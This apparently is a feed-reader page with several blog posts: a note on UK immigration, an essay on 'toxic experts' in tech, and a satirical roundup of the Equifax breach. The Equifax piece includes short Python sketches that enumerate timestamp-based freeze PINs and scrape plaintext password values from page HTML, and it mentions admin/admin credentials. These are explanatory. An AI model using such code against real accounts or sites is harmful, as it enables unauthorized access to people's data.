But, well, tough luck. It’s a fall from grace but it could be much worse. It has opened our eyes to the truth of the UK’s narrow and punitive social contract. I hope that many of us make common cause with people in the detention centres or at the mercy of those who exploit May’s “hostile environment” for their own ends. I hope privileged immigrants join the dots and do what that calls for. God knows I hope the vast number of EU citizens staffing the NHS do all they can to subvert the myth of expensive “health tourism” (a phenomenon I suspect is as rare as false claims of sexual assault and rape, not that you’d know either from reading a British newspaper).

We have a place to live, for now, though it isn’t home, and will never feel like it again. I used to say “we” when I talked about politics in the UK. Now I say “you”, or better, nothing at all.


Toxic experts

1 Comment and 5 Shares

I wrote Big-O: how code slows as data grows to explain Big-O notation. My goal was to explain it in broad strokes for people new to the idea. It grew out of thinking I'd been doing about beginners and experts. In the comments, there was an unexpected and unfortunate real-world lesson.

An anonymous coward named "pyon" said I should be ashamed. They pointed out a detail of algorithmic analysis that I had not mentioned. It's a detail that I had never encountered before. I think it's an interesting detail, but not one that needed to be included.

Pyon is an example of a toxic expert. People like this know a lot, but they use that knowledge to separate themselves from the unwashed masses of newbs. Rather than teach, they choose to sneer from their lofty perches, lamenting the state of the world around them, filled as it is with People Who Don't Want To Learn.

The important skill pyon and other toxic experts are missing is how to connect with people. They could use their knowledge to teach, but it's more important to them to separate themselves from others. Points of correctness are useless without points of connection.

Toxic experts care more about making distinctions between people to elevate themselves than they do about helping people. Beware: they are everywhere you look in the tech world. It's easy to run into them when you are trying to learn. Ignore them. They don't know you, and they don't know what you can do.

Pyon is fixated on a particular detail of algorithmic analysis, and feels that it is essential to understanding Big-O. What I can tell you is that I am doing fine in my 30-year career, and I had never heard that particular detail. My Big-O piece wasn't meant to be exhaustive. There are entire books written about algorithmic notation. I even wrote at the end, "There's much more to algorithm analysis if you want to get into the true computer science aspects of it, but this is enough for working developers."

But pyon can't see the forest for the trees. Experts have spent a lot of time and energy learning what they know. They love their knowledge. They wouldn't have been able to get where they are without a passion for the subject. But sometimes they have a hard time seeing how people can be successful without that well-loved knowledge. They've lost sight of what it means to be a beginner, and what beginners need to learn.

Toxic experts will latch onto a particular skill and decide that it is essential. For them, that skill is a marker dividing Those-Who-Know from Those-Who-Don't. These shibboleths vary from expert to expert. In the current case, it's a detail of algorithmic analysis. I've seen other toxic experts insist that it's essential to know C, or assembly language, or recursion and pointers, and so on.

I'm not saying those aren't good things to know. The more you know, the better. Every one of these topics will be useful. But they are not essential. You can do good work without them. You certainly don't deserve to be spat upon.

The ultimate irony is that while pyon and other toxic experts are bemoaning the state of the industry because of missing knowledge, they are highlighting the main skill gap the tech industry needs to fix: empathy.

1 public comment
jepler
2634 days ago
I'm a recovering toxic expert :-/
Earth, Sol system, Western spiral arm
digdoug
2633 days ago
Me too, it's amazing how much hate I have for people that haven't started recovering yet!

News Roundup: EquiTF

3 Comments and 5 Shares

We generally don’t do news roundups when yet another major company gets hacked and leaks personally compromising data about the public. We know that “big company hacked” isn’t news, it’s a Tuesday. So the Equifax hack didn’t seem like something worth spending any time to write an article about.

But then new things kept coming out. It got worse. And worse. And worse. It’s like if a dumpster caught on fire, but then the fire itself also caught on fire.

If you have been living under a rock, Equifax, a company that spies on the financial behavior of Americans and sells that intelligence to banks, credit card companies, and anyone else who’s paying, was hacked, and the culprits have everything they need to steal the identities of 143 million people.

[Image: The Equifax logo being flushed in a toilet, complete with some artsy motion blur]

That’s bad, but everything else about it is worse. First, the executives kept the breach secret for months, and then sold stock just before the news went public. That is a move so utterly brazen that they might as well be a drunk guy with no shirt shouting, “Come at me bro! Come at me!” They’re daring the Securities and Exchange Commission to do something about it, and are confident that they won’t be punished.

Speaking of punishment, the CEO retired, and he’ll be crying about this over the $90M he’s collecting this year. The CIO and CSO went first, of course. They probably won’t be getting huge compensation packages, but I’m sure they’ll land cushy gigs somewhere.

Said CSO, by the way, had no real qualifications to be a Chief Security Officer. Her background is in music composition.

Now, I want to be really clear here: I don’t think her college degree is actually relevant. What you did in college isn’t nearly as important as your work experience, which is the real problem- she doesn’t really have that, either. She’s spent her entire career in “executive” roles, and while she was a CSO before going to Equifax, that was at First Data. Funny thing about First Data: up until 2013 (about when she left), it was in a death spiral that was fixed after some serious house-cleaning and restructuring- like clearing out dead-weight in their C-level.

Don't worry about the poor shareholders, though. Remember Wells Fargo, the bank that fraudulently signed up lots of people for accounts? They list Equifax as an investment opportunity that's ready to "outperform".

That’s the Peter Principle and corporate douchebaggery in action, and it certainly starts getting me angry, but this site isn’t about class struggle- it’s about IT. And it’s on the IT side where the real WTFs come into play.

Equifax spies on you and sells the results. The US government put a mild restriction on this behavior: they can spy on you, but you have the right to demand that they stop selling the results. This is a “credit freeze”, and every credit reporting agency- every business like Equifax- has to do this. They get to charge you money for the privilege, but they have to do it.

To “secure” this transaction, when you freeze your credit, the credit reporting companies give you a “password” which you can use in the future to unfreeze it (because if you want a new credit card, you have to let Equifax share your data again). Some agencies give you a random string. Some let you choose your own password. Equifax used the timestamp on your request.
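
To put a number on how bad a timestamp is as a secret, here is a rough sketch. It assumes the PIN is the request time at minute resolution, rendered as ten digits in `MMDDYYHHMM` order; that format, the `timestamp_pins` helper, and the example date are illustrative assumptions, not details taken from Equifax.

```python
from datetime import datetime, timedelta


def timestamp_pins(start, end, fmt="%m%d%y%H%M"):
    """Yield every PIN a minute-resolution timestamp scheme could issue in [start, end).

    The MMDDYYHHMM layout is an assumption made for this sketch.
    """
    current = start.replace(second=0, microsecond=0)
    while current < end:
        yield current.strftime(fmt)
        current += timedelta(minutes=1)


# Hypothetical scenario: the attacker knows (or guesses) the day of the freeze request.
one_day = list(timestamp_pins(datetime(2017, 9, 8), datetime(2017, 9, 9)))

print(len(one_day))  # candidates to try for one known day
print(10 ** 10)      # size of the space for a truly random 10-digit PIN
```

Under those assumptions, knowing the day of the request leaves 1,440 candidates instead of ten billion, and even a whole year is only about half a million guesses.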

The hack itself was due to an unpatched Struts installation. The flaw itself is a pretty fascinating one, where a maliciously crafted XML file gets deserialized into a ProcessBuilder object. The flaw was discovered in March, and a patch was available shortly thereafter. Apache rightfully called it “Critical”, and encouraged all Struts users to apply the fix.

Even if they didn’t apply the fix, Apache provided workarounds- some of which were as simple as, “Turn off the REST plugin if you’re not using it,” or “if you ARE using it, turn off the XML part”. It’s certainly not the easiest fix, especially if you’re on a much older version of Struts, but you could even patch just the REST plugin, cutting down on the total work.

Now, if you’re paying attention, you might be saying to yourself, “Hey, Remy, didn’t you say that they were breached (initially) in March? The month the bug was discovered? Isn’t it kinda reasonable that they wouldn’t have rolled out the fix in time?” Yes, that would be reasonable: if a flaw exposed in March was exploited within a few days or even weeks of the flaw being discovered, I could understand that. But remember, the breach that actually got announced was in July- they were breached in March, and they still didn’t apply the patch. This honestly makes it worse.

Even then, I’d argue that we’re giving them too much of the benefit of the doubt. I’m going to posit that they simply don’t care. Not only did they not apply the patch, they likely had no intention of applying the patch, because they assumed they’d get away with it. Remember: you are the product, not the customer. If they accidentally cut the sheep while shearing, it doesn’t matter: they’ve still got the wool.

As an example of “they clearly don’t care”, let’s turn our attention to their Argentinian Branch, where their employee database was protected by the password admin/admin. Yes, with that super-secure password, you could log in from anywhere in the world and see the users’ usernames, employee IDs, and personal details. Of course, their passwords were obscured as “******”… in the rendered DOM. A simple “View Source” would reveal the plaintext of their passwords, in true “hunter2” fashion.
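
For anyone wondering why masking in the browser protects nothing, a minimal sketch follows. The markup in `page_source` is invented for illustration (the real page's HTML isn't reproduced here), and `PasswordFieldReader` is a hypothetical helper built on Python's standard `html.parser`. The point is only that a password field's `value` attribute travels to the client in plaintext, whatever the browser draws on screen.

```python
from html.parser import HTMLParser


class PasswordFieldReader(HTMLParser):
    """Collect the value attribute of every <input type="password"> in a page."""

    def __init__(self):
        super().__init__()
        self.leaked = []

    def handle_starttag(self, tag, attrs):
        attributes = dict(attrs)
        if tag == "input" and attributes.get("type") == "password":
            # The browser renders dots or asterisks, but the source holds the real value.
            self.leaked.append(attributes.get("value"))


# Hypothetical page source, standing in for what "View Source" would show.
page_source = (
    '<form>'
    '<input type="text" name="user" value="jdoe">'
    '<input type="password" name="pw" value="hunter2">'
    '</form>'
)

reader = PasswordFieldReader()
reader.feed(page_source)
print(reader.leaked)
```

Anything the server puts in the page is readable by whoever receives the page, so the only real fix is never sending the password to the client at all.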

Don’t worry, it gets dumber. Along with the breach announcement, Equifax took to social media to direct users to a site where, upon entering their SSN, it would tell them whether or not they were compromised. That was the promise, but the reality was that it was little better than flipping a coin. Worse, the site was a thinly veiled ad for their "identity protection" service, and the agreement contained an arbitration clause which kept you from suing them.

That is, at least if you went to the right site. Setting aside the wisdom of encouraging users to put confidential information into random websites, for weeks Equifax’s social media team was directing people to the wrong site! In fact, it was directing them to a site which warns about the dangers of putting confidential information into random websites.

And all of that, all of that, isn’t the biggest WTF. The biggest WTF is the Social Security Number, which was never meant to be used as a private identifier, but as it’s the closest thing to unique data about every American, it substitutes for a national identification system even when it’s clearly ill-suited to the task.

I’ll leave you with the CGP Grey video on the subject:

3 public comments
jasoncrowther
2669 days ago
Ouch.
chrisminett
2669 days ago
Wow
Milton Keynes, UK
zippy72
2672 days ago
Equifax: "it’s like if a dumpster caught on fire, but then the fire itself also caught on fire." Perfect.
FourSquare, qv